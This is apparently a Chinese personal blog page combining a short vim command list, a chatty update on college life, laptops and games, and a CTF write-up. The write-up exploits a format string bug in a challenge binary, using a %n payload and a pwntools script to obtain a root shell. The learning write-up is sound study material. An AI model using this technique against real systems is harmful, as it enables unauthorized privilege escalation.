前言

还别说，vim确实看起来挺蠢的，但是用起来真的很香。特备是针对没有小键盘和鼠标的机器。

特别适合那种外带只有一个笔记本，不带鼠标的人。所以特此再次列出一些常用功能

全部功能

:q 退出
:q! 强制（不保存）退出
:wq 保存退出
:set nu 显示行号
:set nonu 隐藏行号

hjkl 左上下右

阅读全文...

写在开头

好久没写近况了啊_(:з)∠)_。。想像上次写近况还是高考前，应该有五个月前把。

不知不觉2018叶快要过去了，但是想想高考竟然只是今年6月份的事情，不得不感觉今年过的好慢啊。

“欸，高考原来是今年啊，不是去年的事情吗？” 有这种想法。可能是因为高考何我的压力不大的缘故，压力大的应该是去年的艺考。

然而艺考的时候我却还没意识到艺考的重要性，惊了，真正报志愿的时候才知道艺考的重要性。

（STM高考文化分只要过线就行剩下的看艺考分数就行了，也就是说我文化分考的比普通艺术生高了将近100分却并没有什么卵用。

这样带来的遗憾就是和理想中的学校只差了1分。就是这1分，我可以上个本地学校，并且校内牌名算是省内前几的学校，和如今这种山区学校。这也许是近年来说最大的遗憾之一把。。

不过既然事情都过去了那也没办法咯。

现在

目前蛋疼的事情就是，我没院要我弄一个什么医保的名单，听起来很厉害，实际上就是一个打表格的东西，还是垃圾flash，还得我写程序都没办法写。其实可以是写，但是为了这个flash再去抓包再去调试我觉得十分不值得。而且辅导员还老是因为这个原因来烦我。很难受。消极怠工。优先级down。基本不是到最后时刻我都是不会弄的。最主要是这玩意并没有什么回报。蛋疼的要死。

至于学业，基本是完全没啥压力，这种级别的学校的艺考，很多基本都是高考前学了一两年音乐再考进来的。基础基本木有，所以学校也是再打基础，基础嘛emmmm，虽然我基础也不算怎么好（实际上是我也不知道自己基础咋样）但是对于目前教学来说还是轻松无压力的。

但是最蛋疼的就是。这学校主要教的不是音乐，大部分是什么和音乐无关的东西。别人说大一就是轻松，我倒是不喜欢这种轻松，这种轻松都是建立在大多数党建课程啊，历史课程啊。这种课因为课程轻松。但是我还是更喜欢多一些专业课程，毕竟这种课对我来说基本就是浪费时间。倒是有一些课程可以让我看日语书就是了。

其中最讨厌的课就是tmd形体课，对，就是让我们跳芭蕾舞。我：？？？？？stm，芭蕾舞，对于我这种死宅来说，尴尬先不说，这种课基本等于是要我命级别的。太kb了。

到了这边的话，主要是怠惰程度up。很大程度是因为没办法看书。why？周围的人全都在玩手机，课上也在玩手机。对于我看书的压力影响很大（虽然基本都是我的原因。至于图书馆，太远了。而且我没这垃圾排课，基本没有time是连续的，距离又远，还没看个几分钟就得上课去了。

练琴也一样。我这种人倒是习惯做事做很久而不是这种一会儿的东西。所以大部分时间我宁愿宅在宿舍或者工作室。

宿舍的话就不说了，舍友说不上垃圾，但是知识水平是真的很低的。也不能说低吧，只能说志向不同。顶多应付应付就行了。这就导致我效率很差，而且他们一个个都是乖宝宝。stm做个东西更什么一样过来烦你，烦你就算了，看你在做有意义的东西还过来阻碍你emmmm

在工作室的话效率就挺高了。网速叶好，不像宿舍网路不仅限速还断网断电，难受的要死。就是不能像宿舍里那么舒服，有被子有床。但是也好，效率挺高的。而且因为地理位置的远古，上完课比起回宿舍，我倒是更喜欢去工作室坐着。

设备

到了这边呢，因为之前家里的数位板没带来，所以就去咸鱼二手掏了一个数位板，买来发现在win10下没有压感，卧槽。那就真的沦为osu专用板子了hhhhh

然后就是换了个笔记本，之前用了将近四年的联想G50-30，那性能，那重量，那续航，简直惨不忍睹。2.5KG，续航2h，N2480的CPU。woc。这简直就是又重又垃圾，赶紧700把这玩意出了，然后自己又垫了500，换成了一个thinkpad x240。小巧，续航高，挺舒服的，反正咱不打游戏。这个玩意基本就是我带到工作室的生产工具了233

台式因为在床下，舍友，电量，网络等种种因素，最近倒是很少用了。_(:з)∠)_。。。

游戏

沉迷了几天砍口雷。之后实在肛不下去了，好累啊。瞎到暴死的话，也就咸鱼在AA0，一直不上M。而且也不怎么玩，现在沦为和基友偶尔玩一玩的级别了。最近玩的最多的，也就只有osu和数字英雄了。虽然两款时间都不怎么多，一周2h左右的时间把

然后前段时间，不知道为啥，脑抽买了一款文明5.卧槽。简直有毒，压根停不下来。太Kb了。
嗯，现在7点，文明5，启动。下一回合，下一回合...，enn怎么断电了（断电时间是11.30），嗯嗯嗯，，，，，卧槽屏幕怎么闪了一下，切出去一看，电池电量3%，而且一看时间。2.10分。。我滴妈。太Kb了。

最后打完一局游戏，我看了steam游戏时间，一局就花了我12小时hhh，真的是别的游戏要钱，这款游戏要命啊

最后

还有很多很多东西，实在写不下了（其实是懒得写了）。就这样吧

前言

这次结束之后看到pwn能力太弱了，就想试着研究一波。

比赛的时候压根没分析，赛后看了下逻辑，发现非常的简单。

至少本地环境上如果地址不变没开alsr这些是十分简单的。

程序地址在这里：format.rar

开始

首先看名字，提示十分明显，format。基本和字符串格式化有关系咯。

拉到IDA PRO看看逻辑

代码逻辑十分简单

基本就是

secret = 0;
fget(str,1024,std::stdin);//从命令行接受80h也就是128个字符长度的数据
print(str);把这个字符串打印
if (secret != c0h){printf("Sorry, secret=%d\n",secret);}
else{system("/sbin/su -i");//获取权限}

更具代码我们知道，我们主要修改secret这个变量的值就可以了。我们在ida pro那里看看这个值的地址是多少

之后就是关于字符串format漏洞修改内存地址的啦。

相关资料在这里：

• 原创 Linux下面格式化字符串漏洞,学习笔记分享.
• 格式化字符串漏洞利用
• Linux pwn入门教程(6)——格式化字符串漏洞

不过和教程中不一样的是，在此之前，我们得先找到我们程序format漏洞字符串所在栈中的偏移。

这个偏移才是让format语句把数据指向我们的地址的关键，毕竟这个字符串就是poc，包含要写入的地址。

我们打开gdb，设置printf断点。

然后按r执行，输入11111111测试字符串。程序将会执行到断点处

然后执行x/30x $sp 来查看

发现第13个字段编程3131313131,31的ascii也就是对应的1的字符。

我们在程序内用%12$x 检查，发现内容不正确。
（%数字$操作符 的意思就是用第几个偏移，已什么方式输出，这里是x就是已16进制，d是整数，s是字符串）
最后检查发现是%11$x 对应我们的31313131，也就是在程序内使用第十一个偏移。

最后我们构造poc，用%n像该地址写入数值。

所以我们的playload，应该是\x48\xa0\x04\x08%188c%11$n 其中，x48xa0x04x08是我们要写入的地址。%188c的意思是把188转换为16进制写入。

为什么是188呢？因为最后是验证secret是否等于C0H，也就是是否等于192。%n的意思是写入字节长度，\x48\xa0\x04\x08刚好是四字节，加上这188刚好是192等于C0H，达到最后验证secret相等的效果。

最后就是实现了。

因为\x48\xa0\x04\x08这几个属于特殊字符，直接输入并不会被转义，所以得需要程序帮我们构造输入。这时候我们可以使用pwntools

sudo apt install python
sudo apt install python-pip
sudo pip install pwntools

详细教程可以看：pwntools使用

我们构造poc代码如下：

from pwn import *
io = process('format')#format必须和这个Py脚本同一目录下
io.sendline('\x48\xa0\x04\x08%188c%11$n')
io.interactive()  #直接进行交互，相当于回到shell的模式，在取得shell之后使用

成功取得shell